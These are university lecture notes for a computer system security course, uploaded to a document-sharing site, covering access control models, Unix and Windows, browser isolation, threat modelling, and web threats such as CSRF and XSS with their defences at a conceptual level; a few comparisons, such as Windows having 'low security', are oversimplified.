100% found this document useful (1 vote)
164 views32 pages

UNIT - 3 Notes

The document discusses concepts related to computer system security including access control, Unix and Windows access control, browser isolation, and web security threats. Access control limits access to systems and resources through identification, authentication, and authorization. Different access control models include attribute-based, discretionary, mandatory, and role-based access control. Browser isolation separates browsing activity from local devices and networks to reduce security risks by containing threats in isolated, disposable environments.

Uploaded by

Sushant Yadav
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
164 views32 pages

UNIT - 3 Notes

The document discusses concepts related to computer system security including access control, Unix and Windows access control, browser isolation, and web security threats. Access control limits access to systems and resources through identification, authentication, and authorization. Different access control models include attribute-based, discretionary, mandatory, and role-based access control. Browser isolation separates browsing activity from local devices and networks to reduce security risks by containing threats in isolated, disposable environments.

Uploaded by

Sushant Yadav
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 32

BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

COMPUTER SYSTEM SECURITY


(KNC301)
UNIT -3

Secure architecture principles isolation and leas:


Access Control Concepts, Unix and windows access
control summary, Other issues in access control,
Introduction to browser isolation.
Web security landscape : Web security definitions goals
and threat models , HTTP content rendering .Browser
isolation .Security interface , Cookies frames and frame
busting, Major web server threats ,Cross site request
forgery ,Cross site scripting , Defenses and protections
against XSS , Finding vulnerabilities ,Secure
development.

1
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

Access Control
1. Access control is a method of limiting access to a system,
physical or virtual resources.

2. It is a process by which users can access and are granted


certain prerogative to systems, resources or information.

3. Access control is a security technique that has control over


who can view different aspects, what can be viewed and
who can use resources in a computing environment.

4. It is a fundamental concept in security that reduces risk to


the business or organization

5. Access control systems perform identification,


authentication, and authorization of users and entities by
evaluating required login credentials that may include
passwords, pins, bio-metric scans or other authentication
factors.

6. There is multifactor authentication which requires two or


more authentication factors which is an important part of
the layered defines to protect access control systems.

2
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

Different Models Of Access Control

Different access control models are:

1. Attribute-based Access Control (ABAC): In this


model, access is granted or declined by evaluating a set
of rules, policies, and relationships using the attributes of
users, systems and environmental conditions.

2. Discretionary Access Control (DAC): In DAC the


owner of data determines who can access specific
resources.

3. History-Based Access Control (HBAC): In this model,


access is granted or declined by evaluating the history of
activities of the inquiring party that includes behaviour,
the time between requests and content of requests.

4. Identity-Based Access Control (IBAC): By using this


model. Network administrators can more effectively
manage activity and access, based on individual
requirements.

5. Mandatory Access Control (MAC): A control model in


which access rights are regulated by a central authority
based on multiple levels of security. Security Enhanced
Linux is implemented using MAC on the Linux operating
system.

3
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

6. Organization-Based Access control (OBAC): This


model allows the policy designer to define a security
policy independently of the implementation.

7. Role-Based Access Control (RBAC): RBAC allows


access based on the job title. RBAC eliminates discretion
on a large scale when providing access to objects. For
example, there should not be permissions for human
resources specialist to create network accounts.

8. Rule-Based Access Control (RAC): RAC method is


largely context based. For example, this would be only
allowing students to use the labs during a certain time of day.

Implementation Of Access Control

Implementation of access control:

1. Administrative access control:

a. Administrative access control sets the access control


policies and procedures for the whole organization,
defines the implementation requirements of both physical
and technical access control, and what the consequences
of non-compliance will be.

b. Examples are supervisory structure, staff and contractor


controls, information classification, and training, auditing,
and testing.

4
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

2. Physical access control:

a. Physical access control is critical to an organizations


security and applies to the access or restriction of access
to a place such as property, building or room.

b. Examples are fences, gates, doors, turnstiles, etc., using


locks, badges, bio-metrics (facial recognition,
fingerprints), video surveillance cameras, security guards,
motion detectors, mantrap doors, etc., to allow access to
certain areas.

3 .Technical or logical access control :

a. Technical or logical access control limits connections to


computer networks, system files, and data.

b. It enforces restrictions on applications, protocols,


operating systems, encryptions mechanisms, etc.

c. Examples are access control lists, intrusion detection


systems, and antivirus software.

5
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

Characteristics And Features Of Unix


Characteristics of UNIX:

1. Memory allocation: It keeps tracks of primary memory i.e.,


which part of it is in use or not and by whom, as well as it
allocates memory when a program request.

2. Processor management: It allocates the CPU for a process


or deallocates if not required.

3. Device management: It keeps tracks of all devices it decides


for how much time and to whom should be given the priority.

4. File management: It allocates and deallocates the resources,


it also decides to whom the resources should be given

5. Security: By means of password and some other techniques,


preventing unauthorized access to program and data.

Features of UNIX:

1. Portable: Unix can be installed on many hardware


platforms.

2 Multi-user: The Unix users allow multiple users to


concurrently share.

3. Hardware And Software: Multi-tasking: Unix allows a user


to run more than one program at a time. In fact, more than one
program are running at the background.

6
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

4. While User Is Working On The Foreground: Networking:


While Unix was developed to an interactive, multi-user, multi-
tasking system, networking is incorporated in the heart of the
operating system

5. Organized file system: Unix has organized file and


directory system that allows users to organize and maintain
files.

6. Device independence: Unix treats input output devices as


ordinary files. The destination of file input and output is easily
controlled through Unix design feature called redirection.

7. Utilities: Unix provides a rich library of utilities that can


increase user's productivity.

Differentiate between Unix and Windows


UNIX

1. It is an open source.

2. It has very high security system

3. It is a command-based operating system.

4. The file system is arranged in hierarchical manner

5. Unix is not user friendly.

7
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

Windows

1. It is a close source.

2. It has low security system

3. It is a not command-based operating system.

4. The file system is arranged in a parallel manner.

5. It is user friendly

Browser Isolation
1. Browser isolation is a cyber security model for web
browsing that can be used to physically separate an
internet user's browsing activity from their local machine,
network and infrastructure.

2. With this model, individual browser sessions are


abstracted away from hardware and direct internet access,
trapping harmful activity inside the disposable
environment.

3. Browser isolation may also be referred to as remote


browser isolation, web isolation or remote browsing.

8
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

4. A major weakness in popular security tools is protection


from web or browser-based attacks, malware and
ransomware.

5. By separating browsing activity from endpoint hardware,


the device's attack surface is reduced, sensitive data is
protected and malware or other known and unknown
security threats are minimized.

6. This is an evolution of the cyber security concepts of


security through physical isolation and air-gapping.

Working Of Browser Isolation

1. Browser isolation works by providing users with a


disposable, non-persistent environment for browsing.

2 This can be executed through a variety of methods but


involves virtualization, containerization or cloud browsing.

3. When a user closes the browsing session or the session is


timed out, the isolated environment is reset or discarded.

4. Any malicious code or harmful traffic is discarded as well,


preventing it from ever reaching the endpoint device or
network.

5. The browser isolation method treats all websites, files and


content equally by labelling them as untrusted or blacklisted
unless otherwise specified.

9
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

6. Within the isolated environment, files can be rendered


remotely or sanitized without the need to download them.

7. This is different from other security methods that do not treat


information equally and filter content based on potential
threatening signs.

The Advantages And Disadvantages Of Browser


Isolation
Advantages of browser isolation:

1. The primary benefit to browser isolation is reducing the


spread of malware through web browsers.

2. It is more effective than other anti-virus application methods


since it does not need to be programmed to find specific threats
or risks.

Disadvantages of browser isolation:

1. The installation of browser isolation can be complex or


expensive.

2. Browser isolation may cause users to experience slight


delay or lag times when browsing.

10
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

Web Security With Its Goals.

1. Web security is the process of securing confidential data


stored online from unauthorized access and modification.

2. This is accomplished by enforcing strict policy measures.

3. Websites are scanned for any possible vulnerabilities


and malware through website security software. This
software can scan for backdoor hacks, redirect hacks,
Trojans, and many other threats.

4. A website security software notifies the user if the


website has any issue and provides solutions to address
them.

5. It is the cumulative phrase for all of the methods and


measure that we can use and enforce to keep the files
behind our website and any data of our customers safe.

6. Security should be built into our website from beginning,


but certain systems, the likes of WordPress, allow us to
easily install security measures at any time at little or no
cost.

The goal of web security is to identify the following:

1. Critical assets of the organization


2. Genuine users who may access the data

11
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

3. Level of access provided to each user


4. Various vulnerabilities that may exist in the
application
5. Data criticality and risk analysis on data exposure.
6. Appropriate remediation measures.

Threat Modelling

1. Threat modelling is a procedure for optimizing network


security by identifying objectives and vulnerabilities,
and then defining coulter measures to prevent, or
mitigate the effects of threats to the system.

2. In this context, a threat is a potential or actual adverse


event that may be malicious (such as a denial-of-service
attack) or incidental (such as the failure of a storage
device), and that can compromise the assets of an
enterprise.

3. The key to threat modelling is to determine where the


most effort should be applied to keep a system secure.

4. Threat modelling is an iterative process that consists of


defining enterprise assets, identifying what each
application does with respect to these assets, creating a
security profile for each application, identifying
potential threats, prioritizing potential threats, and
documenting adverse events and the actions taken in
each case.

12
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

5. Threat modelling is a structured approach to


identifying, quantifying, and addressing threats.

6. It allows system security staff to communicate the


potential damage of security flaws and prioritize
remediation efforts.

Purpose of Threat Modelling

1. The purpose of threat modelling is to identify,


communicate, and understand threats and mitigation to
the organisation's stakeholder's as early as possible.

2. Documentation from this process provides system


analyst and defenders with a complete analysis of
probable attacker profile.

Rendering
1. Rendering or image synthesis is the automatic process
of generating a photorealistic or non-photorealistic
image from a 2D or 3D model by means of computer
programs. Also, the result of displaying such a model is
called a render.

2. A rendering engine is often used interchangeably with


browser engines. It is responsible for the layout of our
website on our audience's screen.

13
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

3. A rendering engine is responsible for the paint, and


animations used on our website.

4. It creates the visuals on the screen or brightens the


pixels exactly how they are meant to be to give the feel
of the website like how it was made to be.

Steps for what happens when we surf the web:

1. We type an URL into address bar in our preferred browser.

2. The browser parses the URL to find the protocol, host,


port, and path. It forms a HTTP request.

3. To reach the host, it first needs to translate the human


readable host into an IP number, and it does this by doing
a DNS lookup on the host.

4. Then a socket needs to be opened from the user's computer


to that IP number, on the port specified (most often port
80).

5. When a connection is open, the HTTP request is sent to


the host.

6. The host forwards the request to the server software


configured to listen on the specified port.

14
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

7. The server inspects the request and launches the server


plugin needed to handle the request.

8. The plugin gets access to the full request, and starts to


prepare a HTTP response.

9. The plugin combines that data with some meta data and
sends the HTTP response back to the browser.

10. The browser receives the response, and parses the HTML
in the response, A DOM tree is built out of the broken
HTML.

11. New requests are made to the server for each new
resource that is found in the HTML source (typically
images, style sheets, and JavaScript files).

12. Stylesheets are parsed, and the rendering information in


each gets attached to the matching node in the DOM tree.

13. JavaScript is parsed and executed, and DOM nodes are


moved and style information is updated accordingly.

14. The browser renders the page on the screen according to


the DOM tree and the style information for each node.

15. We see the page on the screen.

15
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

List Of Rendering Engines Produced By Major Web


Browser Vendors:

1. Blink: It is used in Google Chrome, and Opera browsers.

2. WebKit: It is used in Safari browsers.

3. Gecko: It is used in Mozilla Firefox browsers.

4. Trident: It is used in Internet Explorer browsers.

5. EdgeHTML: It is used in Edge browsers.

6. Presto: Legacy rendering engine for Opera.

Security Interface Framework

1. The Security Interface Framework is a set of Objective-C


classes that provide user interface elements for programs
that implement security features such as authorization,
access to digital certificates, and access to items in
keychains.

2. User Interface (UD) defines the way humans interact with


the information systems.

3. User Interface (UD) is a series of pages, screens, buttons,


forms and other visual elements that are used to interact
16
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

with the device. Every app and every website has a user
interface.

4. User Interface (UD design is the creation of graphics,


illustrations, and use of photographic artwork and
typography to enhance the display and layout of a digital
product within its various device views.

5. Interface elements consist of input controls (buttons, drop-


down menus, data fields), navigational components
(search fields, slider, icons, tags), informational
components (progres8s bars, notifications, message
boxes).

Cookies and Frame Busting

Cookies:
1. These are small text files that the web browser stores on
the computer.

2. The first time we visit a page on the internet, a new cookie


is created, which collects the information that can be
accessed by the website operator.

3. However, some browsers store all cookies in a single file.

4. The information in this text file is in turn subdivided into


attributes that are included individually.
17
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

Frame busting:

1. Frame busting refers to code or annotation provided by a


web page intended to prevent the web page from being
loaded in a sub-frame.

2. Frame busting is the recommended Défense against click-


jacking and is also required to secure image-based
authentication such as the sign-in seal used by Yahoo.

3. Sign-in seal displays a user-selected image that


authenticates the Yahoo login page to the user.

4. Without frame busting, the correct image is displayed to


the user, even though the top page is not the real Yahoo
login page.

5. New advancements in click jacking techniques using drag


and drop to extract and inject data into frames makes
frame busting even more critical.

18
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

Major Web Server Threats


1. Injection flaws:

a. Injection flaws, such as SQL, OS injection occur when


untrusted data is sent to an interpreter as part of a command or
query.

b. The attacker's hostile data can trick the interpreter into


executing unintended commands or accessing data without
proper authorization.

2.Broken Authentication: Application functions related to


authentication and session management are often not
implemented correctly, allowing attackers to compromise
passwords, keys, or session tokens, or to exploit other
implementation flaws to assume other users identities.

3. Sensitive Data Exposure

a. Many web applications and APIs do not properly protect


sensitive data such as financial, healthcare.

b. Attackers may steal or modify such weakly protected data to


conduct credit card fraud, identity theft, or other crimes.

c. Sensitive data may be compromised without extra protection,


such as encryption at rest or in transit, and requires special
precautions when exchanged with the browser.

19
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

4. XML External Entities :

a. Many older or poorly configured XML processors evaluate


external entity references within XML documents.

b. External entities can be used to disclose internal files using


the file URI handler, internal file shares, internal port scanning,
remote code execution, and denial-of-service attacks.

5. Broken access control:

a. Restrictions on what authenticated users are allowed to do


are often not properly enforced.

b. Attackers can exploit these flaws to access unauthorized


functionality and/or data, such as access other users accounts,
view sensitive files, modify other users, data, change access
rights, etc

6. Security misconfiguration:

a. Exploits application stack vulnerabilities such as unpatched


software zero-day threats, and undeleted default accounts.

b. Also exploits misconfigured HTTP headers and verbose


error messages that contain sensitive information.

7. Cross-Site Scripting (XSS):

20
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

a. Injects malicious code from a trusted source to execute


scripts in the victim's browser that can hijack user sessions or
redirect the user to malicious sites.

b. Cross-site scripting is a common vector that inserts malicious


code into a web application found to be vulnerable. Unlike
other web attack types, such as SQL, its objective is not our
web application. Rather, it targets its users, resulting in harm to
our clients and the reputation of our organization.

8. Reflected XSS:

a. Reflected XSS use a malicious script to reflect traffic to a


visitor's browser from web application.

b. Initiated via a link, a request is directed to a vulnerable


website.

c. Web application is then manipulated to activate harmful


scripts.

9. Cross-Site Request Forgery (CSRF):

a .It is also known as XSRF, Sea Surf, or session riding, cross-


site request forgery deceives the user's browser-logged into our
application-to run an unauthorized action.

b. A CSRF can transfer funds in an authorized manner and


change passwords, in addition to stealing session cookies and
business data.

21
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

10. Man in the Middle Attack (MITM):

a. A man in the middle attack can occur when a bad actor


positions himself between application and an unsuspecting
user.

b. MITM can be used for eavesdropping or impersonation.

c. Meanwhile, account credentials, credit card numbers, and


other personal information can easily be harvested by the
attacker.

11. Phishing attack:

a. Phishing can be set up to steal user data, such as credit card


and login information.

b. The perpetrator, posing as a trustworthy entity, fools their


prey into opening an email, text memo, or instant message.

c. Then attract to click a link that hides a payload.

d Such an action can cause malware to be covert installed.

e. It is also possible for ransomware to freeze the user's PC, or


for sensitive data to be passed.

12. Remote File inclusion (RFI):

a. Remote File Inclusion (RFI) exploits weaknesses in those


web applications that dynamically call external scripts.

22
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

b. Taking advantage of that function, an RFI attack uploads


malware and takes over the system.

13. Insecure deserialization:

a. Insecure deserialization often leads to remote code


execution.

b. Even if deserialization flaws do not result in remote code


execution, they can be used to perform attacks, including replay
attacks, injection attacks, and privilege escalation attacks.

14. Using components with known vulnerabilities :

It occurs when attackers are able to take control of and exploit


vulnerable libraries, frameworks, and other modules running
with full privileges.

15. Insufficient logging and monitoring:

a. Insufficient logging and monitoring, allows attackers to


attack systems, maintain persistence, pivot to more systems,
and tamper, extract, or destroy data.

16. Backdoor attack:

a.Being a form of malware, a backdoor circumvents login


authentication to enter a system.

b. Many organizations offer employees and partners remote


access to application resources, including file servers and
databases.

23
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

c. This enables bad actors to trigger system commands in the


compromised system and keep their malware updated.

d. The attacker's files are usually heavily cloaked, making


detection problematic.

Cross-Site Request Forgery


1. Cross-site request forgery (CSRF) is an attack that forces
an end user to execute unwanted actions on a web
application in which they are currently authenticated.

2. CSRF attacks specifically target state-changing requests,


not theft of data, since the attacker has no way to see the
response to the forged request.

3. With the help of social engineering (such as sending a link


via email or chat), an attacker may trick the users of a web
application into executing actions of the attacker's
choosing.

24
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

4. If the victim is a normal user, a successful CSRF attack


can force the user to perform state changing requests like
transferring funds, changing their email address, and so
forth.

5. If the victim is an administrative account, CSRF can


compromise the entire web application.

6. Cross-Site Request Forgery (CSRF) is an attack vector


that tricks a web browser into executing an unwanted
action in an application to which a user is logged in.

7. A successful CSRF attack can be devastating for both the


business and user. It can result in damaged client

25
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

relationships, unauthorized fund transfers, changed


passwords and data theft-including stolen session cookies.

8. As the unsuspecting user is authenticated by their


application at the time of the attack, it is impossible to
distinguish a legitimate request from a forged one.

Prevent CSRF Attack

Prevent CSRF Attack in two ways :

1. On User Side : User side prevention is very inefficient in


terms of browsing experience, prevention can be done by
browsing only a single tab at a time and not using the
remember-me functionality.

2. On Server Side:

a. There are many proposed ways to implement CSRF


protection on server side , among which the use of CSRF
tokens is most popular.

b. A CSRF token is a string that is tied to a user's session but is


not submitted automatically.

c. A website proceeds only when it receives a valid CSRF token


along with the cookies, since there is no way for an attacker to
know a user specific token, the attacker cannot perform actions
on user's behalf.

26
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

Cross-Site Scripting
1. Cross-site scripting (XSS) is vulnerability in a web
application that allows a third party to execute a script in the
user's browser on behalf of the web application.

2. Cross-site scripting is one of the most prevalent


vulnerabilities present on the web.

3. The exploitation of XSS against a user can lead to various


consequences such as account compromise, account deletion,
privilege escalation, malware infection and many more.

4. It allows an attacker to masquerade as a victim user, to carry


out any actions that the user is able to perform and to access
any of the user's data.

5. If the victim user has privileged access within the application


then the attacker might be able to gain full control over all of
the applications functionality and data.

Types Of Cross Site Scripting (XSS).

There are 2 types :

1.REFLECTED XSS :

i. If the input has to be provided each time to execute ,


such XSS is called reflected.

ii. These attacks are mostly carried out by delivering a


payload directly to the victim.
27
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

iii. Victim requests a page with a request containing the


payload & the payload embedded in the response as a
script.

iv. An example, of reflected XSS is XSS in the Search


Field.

2. STORED XSS :

i. When the response containing the payload is stored on


the server in such a way that the script gets executed on
every visit without submission of payload, then it is
identified as stored XSS.

ii. An example of stored is XSS in the Comment thread.

28
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

Different Ways Used To Prevent XSS.


Different ways used to prevent XSS are :

1. Escaping:

a. The first method used to prevent XSS vulnerabilities from


appearing in our applications is by escaping user input.

b. Escaping data means taking the data an application has


received and ensuring it is secure before rendering it for
the end user.

c. By escaping user input, key characters in the data received


by a web page will be prevented from being interpreted in
any malicious way.

d. In essence, we are censoring the data our web page


receives in a way that will disallow the characters
especially <and> characters from being rendered, which
otherwise could cause harm to the application and/or
users.

2.Validating input:

a. Validating input is the process of ensuring an application


is rendering the correct data and preventing malicious data
from doing harm to the site, database, and users.

29
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

b. While whitelisting and input validation are more


commonly associated with SQL injection, they can also be
used as an additional method of prevention for XSS.

с. Whereas blacklisting, or disallowing certain, predetermined


characters in user input, disallows only known bad characters
whitelisting only allows known good characters and is a better
method for preventing XSS attacks as well as others.

d.Input validation is especially helpful and good at preventing


XSS in forms, as it prevents a user from adding special
characters into the fields, instead refusing the request.

e. However, input validation is not a primary prevention


method for vulnerabilities such as XSS and SQL injection, but
instead helps to reduce the effects should an attacker discover
such vulnerability.

3. Sanitizing:

a. A third way to prevent cross-site scripting attacks is to


sanitize user input.

b. Sanitizing data is a strong defense, but should not be used


alone to battle XSS attacks.

c. Sanitizing user input is especially helpful on sites that


allow HTML markup, to ensure data received can do no

30
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

harm to users as well as our database by scrubbing the data


clean of potentially harmful markup, changing
unacceptable user input to an acceptable format.

XSS vulnerabilities
Following are XSS vulnerabilities:

1. Stored XSS vulnerabilities:

a. Stored attacks are those where the injected script is


permanently stored on the target servers, such as in a database,
in a message forum, visitor log, comment field, etc.

b. The victim then retrieves the malicious script from the server
when it requests the stored information. Stored XSS is also
referred to as
Persistent or Type-I XSS.

2. Reflected XSS vulnerabilities:

a. Reflected attacks are those where the injected script is


reflected off the web server, such as in an error message, search
result, or any other response that includes some or all of the
input sent to the server as part of the request.

b. Reflected attacks are delivered to victims via another route,


such as in an e-mail message, or on some other website.

c. When a user is tricked into clicking on a malicious link,


submitting a specially crafted form, or even just browsing to a

31
BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

malicious site, the injected code travels to the vulnerable web


site, which reflects the attack back to the user's browser.

d.The browser then executes the code because it came from a


trusted server.

e.Reflected XSS is also referred to as Non-Persistent or Type


II XSS

3.Server-side versus DOM-based vulnerabilities:

a. XSS vulnerabilities were first found in applications that


performed all data processing on the server side.

b. User input (including an XSS vector) would be sent to the


server, and then sent back to the user as a web page.

32

You might also like